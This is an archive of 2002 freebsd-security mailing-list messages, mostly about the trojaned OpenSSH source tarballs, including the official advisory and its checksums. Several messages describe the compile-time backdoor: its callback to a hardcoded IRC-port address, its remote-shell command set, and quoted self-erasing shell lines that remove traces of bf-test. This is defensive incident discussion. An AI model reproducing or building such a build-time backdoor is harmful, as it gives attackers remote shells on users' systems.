"unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 5:36:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7359B37B405; Thu, 1 Aug 2002 05:36:12 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7783643E72; Thu, 1 Aug 2002 05:35:53 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 8E1E2535E; Thu, 1 Aug 2002 14:35:42 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Trevor Johnson Cc: Mike Tancsa , Ruslan Ermilov , Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] References: <20020801081645.T19455-100000@blues.jpj.net> From: Dag-Erling Smorgrav Date: 01 Aug 2002 14:35:41 +0200 In-Reply-To: <20020801081645.T19455-100000@blues.jpj.net> Message-ID: Lines: 25 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Trevor Johnson writes: > This is the section of http://www.openbsd.org/security.html#default which > I had hoped you would read: > [...] This is the section of Webster's 7th edition dictionary which I had hoped you would read: 1. no \(')n{o-}\ av [ME, fr. OE n{a-}, fr. ne not + {a-} always; akin to ON & OHG ne not, L ne-, Gk n{e-}- -- more at AYE] chiefly Scot 1a: NOT 1b: -- used as a function word to express the negative of an alternative choice or possibility 2: in no respect or degree -- used in comparisons 3: not so -- used to express negation, dissent, denial, or refusal 4: -- used with a following adjective to imply a meaning expressed by the opposite positive statement <~ uncertain terms> 5: -- used as a function word to emphasize a following negative or to introduce a more emphatic, explicit, or comprehensive statement 6: -- used as an interjection to express surprise, doubt, or incredulity DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 5:46:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D0BAB37B405; Thu, 1 Aug 2002 05:46:26 -0700 (PDT) Received: from blues.jpj.net (blues.jpj.net [208.210.80.156]) by mx1.FreeBSD.org (Postfix) with ESMTP id CB13843F6F; Thu, 1 Aug 2002 05:38:12 -0700 (PDT) (envelope-from trevor@jpj.net) Received: from blues.jpj.net (localhost.jpj.net [127.0.0.1]) by blues.jpj.net (8.12.3/8.12.3) with ESMTP id g71CcBot026101; Thu, 1 Aug 2002 08:38:11 -0400 (EDT) (envelope-from trevor@jpj.net) Received: from localhost (trevor@localhost) by blues.jpj.net (8.12.3/8.12.3/Submit) with ESMTP id g71CcBhr026098; Thu, 1 Aug 2002 08:38:11 -0400 (EDT) X-Authentication-Warning: blues.jpj.net: trevor owned process doing -bs Date: Thu, 1 Aug 2002 08:38:11 -0400 (EDT) From: Trevor Johnson To: Dag-Erling Smorgrav Cc: Mike Tancsa , Ruslan Ermilov , Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] In-Reply-To: Message-ID: <20020801083631.H19455-100000@blues.jpj.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 1 Aug 2002, Dag-Erling Smorgrav wrote: > Trevor Johnson writes: > > This is the section of http://www.openbsd.org/security.html#default which > > I had hoped you would read: > > [...] > > This is the section of Webster's 7th edition dictionary which I had > hoped you would read: > > 1. no \(')n{o-}\ av [ME, fr. OE n{a-}, fr. ne not + > {a-} always; akin to ON & OHG ne not, L ne-, Gk > n{e-}- -- more at AYE] chiefly Scot > 1a: NOT Why not? Do you have a reason? > 1b: -- used as a function word to express the negative of an alternative > choice or possibility > 2: in no respect or degree -- used in comparisons > 3: not so -- used to express negation, dissent, denial, or refusal How do you dissent? > 4: -- used with a following adjective to imply a meaning expressed by the > opposite positive statement <~ uncertain terms> > 5: -- used as a function word to emphasize a following negative or to > introduce a more emphatic, explicit, or comprehensive statement > 6: -- used as an interjection to express surprise, doubt, or incredulity -- Trevor Johnson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 5:58:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6A21437B407 for ; Thu, 1 Aug 2002 05:58:29 -0700 (PDT) Received: from yoda.bph.ruhr-uni-bochum.de (yoda.bph.ruhr-uni-bochum.de [134.147.196.7]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2572943E4A for ; Thu, 1 Aug 2002 05:58:28 -0700 (PDT) (envelope-from cwe@bph.ruhr-uni-bochum.de) Received: from gonzo (gonzo [134.147.196.22]) by yoda.bph.ruhr-uni-bochum.de (8.8.8/8.8.8) with SMTP id OAA04090; Thu, 1 Aug 2002 14:58:26 +0200 From: Christoph Wegener To: "Naga Suresh B" Cc: security@freebsd.org Date: Thu, 01 Aug 2002 14:58:26 +0200 X-Priority: 3 (Normal) Organization: Lehrstuhl fuer Biophysik - Ruhr-Universitaet Bochum In-Reply-To: <016301c23957$7d8436f0$9600a8c0@blraddrcom> Message-Id: Subject: Re: openssh-3.4p1.tar.gz trojaned MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" X-Mailer: Opera 6.04 build 1135 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, what do you mean?!? If you mean if another trojaned host will attack you I can say that the trojan code we saw this morning has an hardcoded IP address (203.62.158.32:6667, which is secured now) so you will be safe - at least for now... If you mean how you can find out if your host was trojaned please read the archived mails from today... Cheers Christoph 1.8.2002 14:32:22, "Naga Suresh B" wrote: >how we can findout that trojaned attacked our server or not. -- .-. Ruhr-Universitaet Bochum /v\ L I N U X Lehrstuhl fuer Biophysik // \\ >Penguin Computing< c/o Christoph Wegener /( )\ Gebaeude ND 04/Nord ^^-^^ D-44780 Bochum, GERMANY Tel: +49 (234) 32-25754 Fax: +49 (234) 32-14626 mailto:cwe@bph.ruhr-uni-bochum.de http://www.bph.ruhr-uni-bochum.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 6:23:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9BE3E37B400 for ; Thu, 1 Aug 2002 06:23:09 -0700 (PDT) Received: from thuis.c00lb0x.com (c00lb0x.xs4all.nl [213.84.119.178]) by mx1.FreeBSD.org (Postfix) with ESMTP id CA68143E6E for ; Thu, 1 Aug 2002 06:22:59 -0700 (PDT) (envelope-from tbonex@c00lb0x.com) Received: from mydomain.com (localhost [127.0.0.1]) by thuis.c00lb0x.com (8.12.4/8.12.4/Debian-4) with SMTP id g71DN5cC027525 for ; Thu, 1 Aug 2002 15:23:06 +0200 Received: from 192.168.2.106 (SquirrelMail authenticated user tbonex) by mail.kdevries.com with HTTP; Thu, 1 Aug 2002 15:23:07 +0200 (CEST) Message-ID: <1692.192.168.2.106.1028208187.squirrel@mail.kdevries.com> Date: Thu, 1 Aug 2002 15:23:07 +0200 (CEST) Subject: Re: openssh-3.4p1.tar.gz trojaned From: "DaMastah" To: X-Priority: 3 Importance: Normal X-MSMail-Priority: Normal X-Mailer: SquirrelMail (version 1.2.7) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I just updated a couple of servers to openssh 3.4p1 (portable version) running solaris/debian patched with a chroot-patch. I have checked all tar-balls (freshly extracted) and there aren't any bf-test.c files, does that mean I was just in time with the right source code (I downloaded it around 14:00 CET) and that I am trojan clean ? Furtheron when will we know that a clean version has been released ? Are there any more ways to check for the trojanned version ? Thanks Kevin de Vries To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 6:32: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E78D437B400 for ; Thu, 1 Aug 2002 06:32:03 -0700 (PDT) Received: from mel-rto6.wanadoo.fr (smtp-out-6.wanadoo.fr [193.252.19.25]) by mx1.FreeBSD.org (Postfix) with ESMTP id 10CD843E5E for ; Thu, 1 Aug 2002 06:32:03 -0700 (PDT) (envelope-from patpro@patpro.net) Received: from mel-rta8.wanadoo.fr (193.252.19.79) by mel-rto6.wanadoo.fr (6.5.007) id 3D18683701333A92 for security@freebsd.org; Thu, 1 Aug 2002 15:32:01 +0200 Received: from [192.168.0.22] (80.11.166.151) by mel-rta8.wanadoo.fr (6.5.007) id 3D2A78F600AAFA87 for security@freebsd.org; Thu, 1 Aug 2002 15:32:01 +0200 User-Agent: Microsoft-Entourage/9.0.2509 Date: Thu, 01 Aug 2002 15:32:00 +0200 Subject: Re: openssh-3.4p1.tar.gz trojaned From: patpro To: Message-ID: In-Reply-To: <1692.192.168.2.106.1028208187.squirrel@mail.kdevries.com> Mime-version: 1.0 Content-type: text/plain; charset="ISO-8859-1" Content-transfer-encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org le 1/08/02 15:23, DaMastah =E0 tbonex@c00lb0x.com a =E9crit=A0: > Hi, >=20 > I just updated a couple of servers to openssh 3.4p1 (portable version) > running solaris/debian patched with a chroot-patch. by the way, does the trojan run on debian and/or solaris ? I've been said it's only x86 code for BSD's and wont run on linux, any detailed compatibility info available ? patpro To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 6:54:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 356B737B400 for ; Thu, 1 Aug 2002 06:54:47 -0700 (PDT) Received: from cithaeron.argolis.org (pool-138-88-142-95.esr.east.verizon.net [138.88.142.95]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0AB6743E88 for ; Thu, 1 Aug 2002 06:54:46 -0700 (PDT) (envelope-from piechota@argolis.org) Received: from cithaeron.argolis.org (localhost [127.0.0.1]) by cithaeron.argolis.org (8.12.5/8.12.5) with ESMTP id g71DGsw4091112; Thu, 1 Aug 2002 09:16:54 -0400 (EDT) (envelope-from piechota@argolis.org) Received: from localhost (piechota@localhost) by cithaeron.argolis.org (8.12.5/8.12.5/Submit) with ESMTP id g71DGr7U091109; Thu, 1 Aug 2002 09:16:54 -0400 (EDT) X-Authentication-Warning: cithaeron.argolis.org: piechota owned process doing -bs Date: Thu, 1 Aug 2002 09:16:53 -0400 (EDT) From: Matt Piechota To: Artur Lindgren Cc: freebsd-security@FreeBSD.ORG Subject: Re: Trojan located in latest openssh tar files In-Reply-To: Message-ID: <20020801091503.H91087-100000@cithaeron.argolis.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 1 Aug 2002, Artur Lindgren wrote: > It runs once, upon compilation of openssh, and is named sh or the > compiling users default shell in the processlist in the process > listing. > This trojan attempts to connect to 203.62.158.32:6667 (hacked machine > which has been secured now), > and awaits one of three characters as the command; > D execs /bin/sh > M respawns > A kills the deamon > The /bin/sh executed via the D command was controlled by the daemon > listening on 203.62.158.32:6667, potentially meaning that > people affected by this has given a shell, possibly root, to user unknown. Sounds like it'd only work for the current boot of the machine? Or does it hide somewhere and persist after reboot? -- Matt Piechota To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 7:14:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B297037B400 for ; Thu, 1 Aug 2002 07:14:52 -0700 (PDT) Received: from mail.comitnet.com (skiffer.comitnet.com [212.181.63.123]) by mx1.FreeBSD.org (Postfix) with SMTP id 41BA343E70 for ; Thu, 1 Aug 2002 07:14:51 -0700 (PDT) (envelope-from bond@comitnet.se) Received: (qmail 3060 invoked from network); 1 Aug 2002 14:14:56 -0000 Received: from unknown (HELO ?192.168.57.109?) (212.181.63.111) by 212.181.63.98 with SMTP; 1 Aug 2002 14:14:56 -0000 Mime-Version: 1.0 X-Sender: bond%comitnet.se@pop3.comitnet.com Message-Id: In-Reply-To: <20020801091503.H91087-100000@cithaeron.argolis.org> References: <20020801091503.H91087-100000@cithaeron.argolis.org> Date: Thu, 1 Aug 2002 16:13:59 +0200 To: Matt Piechota From: Artur Lindgren Subject: Re: Trojan located in latest openssh tar files Cc: freebsd-security@FreeBSD.ORG Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >On Thu, 1 Aug 2002, Artur Lindgren wrote: > >> It runs once, upon compilation of openssh, and is named sh or the >> compiling users default shell in the processlist in the process >> listing. >> This trojan attempts to connect to 203.62.158.32:6667 (hacked machine >> which has been secured now), >> and awaits one of three characters as the command; >> D execs /bin/sh >> M respawns >> A kills the deamon >> The /bin/sh executed via the D command was controlled by the daemon >> listening on 203.62.158.32:6667, potentially meaning that >> people affected by this has given a shell, possibly root, to user unknown. > >Sounds like it'd only work for the current boot of the machine? Or does >it hide somewhere and persist after reboot? > >-- >Matt Piechota As i wrote, it runs once upon compilation :-) /Artur Lindgren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 7:32:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 23DCA37B400 for ; Thu, 1 Aug 2002 07:32:29 -0700 (PDT) Received: from mailout03.sul.t-online.com (mailout03.sul.t-online.com [194.25.134.81]) by mx1.FreeBSD.org (Postfix) with ESMTP id 81AD343E7B for ; Thu, 1 Aug 2002 07:32:28 -0700 (PDT) (envelope-from corecode@corecode.ath.cx) Received: from fwd10.sul.t-online.de by mailout03.sul.t-online.com with smtp id 17aH07-0003J8-07; Thu, 01 Aug 2002 16:32:27 +0200 Received: from spirit.zuhause.stoert.net (320050403952-0001@[80.128.125.94]) by fmrl10.sul.t-online.com with esmtp id 17aH05-1POFfcC; Thu, 1 Aug 2002 16:32:25 +0200 Received: from terrorfish.uni.stoert.net (terrorfish.uni.stoert.net [10.150.180.178]) by spirit.zuhause.stoert.net (8.11.6/8.11.6) with ESMTP id g71EWPQ28116 for ; Thu, 1 Aug 2002 16:32:25 +0200 (CEST) (envelope-from corecode@corecode.ath.cx) Received: from terrorfish.uni.stoert.net (localhost [127.0.0.1]) by terrorfish.uni.stoert.net (8.12.5/8.12.5) with ESMTP id g71EVRF0000631 for ; Thu, 1 Aug 2002 16:31:27 +0200 (CEST) (envelope-from corecode@terrorfish.uni.stoert.net) Received: (from corecode@localhost) by terrorfish.uni.stoert.net (8.12.5/8.12.5/Submit) id g71EVRQf000630; Thu, 1 Aug 2002 16:31:27 +0200 (CEST) (envelope-from corecode) Date: Thu, 1 Aug 2002 16:31:21 +0200 From: "Simon 'corecode' Schubert" To: security@freebsd.org Subject: keep the noise low! Message-Id: <20020801163121.6e2be57b.corecode@corecode.ath.cx> Reply-To: corecode@corecode.ath.cx X-Mailer: Sylpheed version 0.8.0claws (GTK+ 1.2.10; i386-portbld-freebsd5.0) Mime-Version: 1.0 Content-Type: multipart/signed; protocol="application/pgp-signature"; micalg=pgp-sha1; boundary="=.imcQ6b'9k,4nXE" X-Sender: 320050403952-0001@t-dialin.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --=.imcQ6b'9k,4nXE Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit ok guys, could you please keep the noise low? the tarball of openssh located on the openbsd site is trojaned, so WHAT? our port got the right checksum, base system isn't trojaned either. WHY BOTHER? AND DON'T SEND THAT STUFF OVER AND OVER AGAIN! T * FREEBSD NOT VULNERABLE DUE TO TROJANED FILE ON OPENBSD.ORG K THX thank you for your attention. replies to me, not to the list. -- /"\ http://corecode.ath.cx/#donate \ / \ ASCII Ribbon Campaign / \ Against HTML Mail and News --=.imcQ6b'9k,4nXE Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9SUY/r5S+dk6z85oRAnz3AKDXPu//80h109t4bEabAlPODHp3GwCfTNE1 OkS8HYwErKW9r+UFs8yH9rc= =YRfJ -----END PGP SIGNATURE----- --=.imcQ6b'9k,4nXE-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 8:23:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AB96E37B400 for ; Thu, 1 Aug 2002 08:23:51 -0700 (PDT) Received: from treebeardmail.webcorelabs.com (dns2.webcorelabs.com [209.115.232.141]) by mx1.FreeBSD.org (Postfix) with SMTP id DE66D43E42 for ; Thu, 1 Aug 2002 08:23:50 -0700 (PDT) (envelope-from chad@evolvs.com) Received: (qmail 1956 invoked by uid 0); 1 Aug 2002 15:23:50 -0000 Received: from unknown (HELO quaker) (209.115.232.130) by localhost with SMTP; 1 Aug 2002 15:23:50 -0000 From: chad To: freebsd-security@FreeBSD.ORG Date: Thu, 01 Aug 2002 09:23:50 -0600 X-Priority: 3 (Normal) Reply-To: chad@evolvs.com Organization: www.evolvs.com In-Reply-To: <20020801201132.98EF.KONNO@hal.rcast.u-tokyo.ac.jp> Message-Id: <41JEYTHBOJMJA6RPKI73QOYTS62HCC7.3d495286@quaker> Subject: Re: openssh-3.4p1.tar.gz trojaned MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" X-Mailer: Opera 6.03 build 1107 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I just upgraded my OpenBSD 3.0 machine to OpenSSH 3.4 last night. I downloaded openssh-3.4.tgz ( notice not p1 ). The MD5 I got was MD5 (openssh-3.4.tgz) = bda7c80825d9d9f35f17046ed90e1b0a And look : [root@superfrink /root/upgrades]# tar -tzf openssh-3.4.tgz | grep bf ssh/ssh-keygen/bf-test.c And then: [root@superfrink /root/upgrades]# head -5 ssh/ssh-keygen/bf-test.c /* * Blowfish input vectors are handled incorrectly on HP-UX PL.2 systems. * Perform routine compatability checks. */ #include So I guess It's not just openssh-3.4p1.tar.gz that is trojaned. /Chad 8/1/2002 5:19:52 AM, Shunichi Konno wrote: >Hello. > >Thank you for your comment, but there was no such a problem. :) >I checked it trojaned or not after I extracted openssh-3.4.tgz. > >And I know too, that "bf-test.out" which is the shell script made >by bf-test.c, will change Makefile and Makefile.in, and remove >bftest* like this: > > grep -v -i bf-test Makefile.in > m.out ; cp m.out Makefile.in ; rm -f m.out > grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out > rm -f bf-test* > > >On Thu, 01 Aug 2002 12:55:46 +0200 >Christoph Wegener wrote: >CW> but be careful: you have to check it with the original tgz-file, cause the shellscript removes its existence itself from the archive once you >CW> have installed. So taking your tree and making a tgz is NO solution to test... > > > >---------- >KONNO Shunichi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 8:25:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DC2F437B400 for ; Thu, 1 Aug 2002 08:25:15 -0700 (PDT) Received: from citi.umich.edu (citi.umich.edu [141.211.92.141]) by mx1.FreeBSD.org (Postfix) with ESMTP id 79E5D43E42 for ; Thu, 1 Aug 2002 08:25:15 -0700 (PDT) (envelope-from provos@citi.umich.edu) Received: by citi.umich.edu (Postfix, from userid 104123) id 85495207C3; Thu, 1 Aug 2002 11:25:11 -0400 (EDT) Date: Thu, 1 Aug 2002 11:25:11 -0400 From: Niels Provos To: freebsd-security@freebsd.org Subject: OpenSSH Security Advisory: Trojaned Distribution Files Message-ID: <20020801152511.GJ6925@citi.citi.umich.edu> Mail-Followup-To: freebsd-security@freebsd.org Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="tmoQ0UElFV5VgXgH" Content-Disposition: inline User-Agent: Mutt/1.3.27i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --tmoQ0UElFV5VgXgH Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable OpenSSH Security Advisory (adv.trojan) 1. Systems affected: OpenSSH version 3.2.2p1, 3.4p1 and 3.4 have been trojaned on the OpenBSD ftp server and potentially propagated via the normal mirroring process to other ftp servers. The code was inserted some time between the 30th and 31th of July. We replaced the trojaned files with their originals at 7AM MDT, August 1st. 2. Impact: Anyone who has installed OpenSSH from the OpenBSD ftp server or any mirror within that time frame should consider his system compromised. The trojan allows the attacker to gain control of the system as the user compiling the binary. Arbitrary commands can be executed. 3. Solution: Verify that you did not build a trojaned version of the sources. The portable SSH tar balls contain PGP signatures that should be verified before installation. You can also use the following MD5 checksums for verification. MD5 (openssh-3.4p1.tar.gz) =3D 459c1d0262e939d6432f193c7a4ba8a8=20 MD5 (openssh-3.4p1.tar.gz.sig) =3D d5a956263287e7fd261528bb1962f24c MD5 (openssh-3.4.tgz) =3D 39659226ff5b0d16d0290b21f67c46f2 MD5 (openssh-3.2.2p1.tar.gz) =3D 9d3e1e31e8d6cdbfa3036cb183aa4a01 MD5 (openssh-3.2.2p1.tar.gz.sig) =3D be4f9ed8da1735efd770dc8fa2bb808a 4. Details When building the OpenSSH binaries, the trojan resides in bf-test.c and causes code to execute which connects to a specified IP address. The destination port is normally used by the IRC protocol. A connection attempt is made once an hour. If the connection is successful, arbitrary commands may be executed. Three commands are understood by the backdoor: Command A: Kill the exploit. Command D: Execute a command. Command M: Go to sleep. 5. Notice: Because of the urgency of this issue, the advisory may not be complete. Updates will be posted to the OpenSSH web pages if necessary. --tmoQ0UElFV5VgXgH Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (OpenBSD) Comment: For info see http://www.gnupg.org iQEVAwUBPUlS1zZ8FqYKL4flAQH+hggAtovk2Gniptltsj9aBa2CpeLJuRm5lKq0 JgVcTer+qb4yszNxeE2/cbi5LERoF/MC3dkNELnf7MMJnAc4u3/Ibu0NRRp5UzNt nqhdshjm7vhepZftOJrbTNT7QwlmkoQdNsape8cm/JOGqx0y3sPpy3g+6ymdBdkL 4KX/RTXNAksW0jWUP7+xILNvxGk8CyJrRtheSKIdIpKphU7zlltHbceqIL47UeXt KInJzEabQ3i0WtoAV1qrUH3toKiqxRl7XHstuUGGu4G/R/plzqaGWKaR+qI5VYda PPg+J9iT53VjZYoxuyiD8sBOnIVPfcBTY9ws6OetNY5S/qDIZvX6WQ== =cpyg -----END PGP SIGNATURE----- --tmoQ0UElFV5VgXgH-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 8:31:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B2D9B37B400 for ; Thu, 1 Aug 2002 08:31:31 -0700 (PDT) Received: from thoth.sbs.de (thoth.sbs.de [192.35.17.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7D8B443E42 for ; Thu, 1 Aug 2002 08:31:30 -0700 (PDT) (envelope-from ust@cert.siemens.de) Received: from mail1.siemens.de (mail1.siemens.de [139.23.33.14]) by thoth.sbs.de (8.11.6/8.11.6) with ESMTP id g71FVQE16809; Thu, 1 Aug 2002 17:31:27 +0200 (MEST) Received: from mars.cert.siemens.de (ust.mchp.siemens.de [139.23.201.17]) by mail1.siemens.de (8.11.6/8.11.6) with ESMTP id g71FVQU13204; Thu, 1 Aug 2002 17:31:26 +0200 (MEST) Received: from alaska.cert.siemens.de (alaska.cert.siemens.de [139.23.202.134]) by mars.cert.siemens.de (8.12.5/8.12.5/Siemens CERT [ $Revision: 1.25 ]) with ESMTP id g71FVQoB000625; Thu, 1 Aug 2002 17:31:26 +0200 (CEST) (envelope-from ust@alaska.cert.siemens.de) Received: from alaska.cert.siemens.de (alaska.cert.siemens.de [127.0.0.1]) by alaska.cert.siemens.de (8.12.5/8.12.5/alaska [ $Revision: 1.14 ]) with ESMTP id g71FVQqa002557; Thu, 1 Aug 2002 17:31:26 +0200 (CEST) (envelope-from ust@alaska.cert.siemens.de) Received: (from ust@localhost) by alaska.cert.siemens.de (8.12.5/8.12.5/alaska [ $Revision: 1.3 ]) id g71FVQrV002556; Thu, 1 Aug 2002 17:31:26 +0200 (CEST) (envelope-from ust) Date: Thu, 1 Aug 2002 17:31:26 +0200 From: Udo Schweigert To: chad Cc: freebsd-security@FreeBSD.ORG Subject: Re: openssh-3.4p1.tar.gz trojaned Message-ID: <20020801153126.GA2245@alaska.cert.siemens.de> References: <20020801201132.98EF.KONNO@hal.rcast.u-tokyo.ac.jp> <41JEYTHBOJMJA6RPKI73QOYTS62HCC7.3d495286@quaker> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-15 Content-Disposition: inline In-Reply-To: <41JEYTHBOJMJA6RPKI73QOYTS62HCC7.3d495286@quaker> X-Operating-System: FreeBSD 4.6-STABLE User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Aug 01, 2002 at 09:23:50 -0600, chad wrote: > I just upgraded my OpenBSD 3.0 machine to OpenSSH 3.4 last night. > I downloaded openssh-3.4.tgz ( notice not p1 ). The MD5 I got was > > MD5 (openssh-3.4.tgz) = bda7c80825d9d9f35f17046ed90e1b0a > > And look : > > [root@superfrink /root/upgrades]# tar -tzf openssh-3.4.tgz | grep bf > ssh/ssh-keygen/bf-test.c > > And then: > > [root@superfrink /root/upgrades]# head -5 ssh/ssh-keygen/bf-test.c > /* > * Blowfish input vectors are handled incorrectly on HP-UX PL.2 systems. > * Perform routine compatability checks. > */ ##include > > So I guess It's not just openssh-3.4p1.tar.gz that is trojaned. > The following changes occured to ftp.openssh.com: Old size -> new size name 398595 -> 401466 openssh-3.4.tgz 822567 -> 825630 portable/openssh-3.2.2p1.tar.gz 837668 -> 840574 portable/openssh-3.4p1.tar.gz So the portable versions 3.4 and 3.2.2 as well as the "native" 3.4 were affected. Meanwhile all 3 have been replaced by the original versions. Best regards -- Udo Schweigert, Siemens AG | Voice : +49 89 636 42170 CT IC CERT, Siemens CERT | Fax : +49 89 636 41166 D-81730 Muenchen / Germany | email : udo.schweigert@siemens.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 8:46: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 40AC937B400 for ; Thu, 1 Aug 2002 08:46:04 -0700 (PDT) Received: from web11601.mail.yahoo.com (web11601.mail.yahoo.com [216.136.172.53]) by mx1.FreeBSD.org (Postfix) with SMTP id 001AE43E7B for ; Thu, 1 Aug 2002 08:46:03 -0700 (PDT) (envelope-from holtor@yahoo.com) Message-ID: 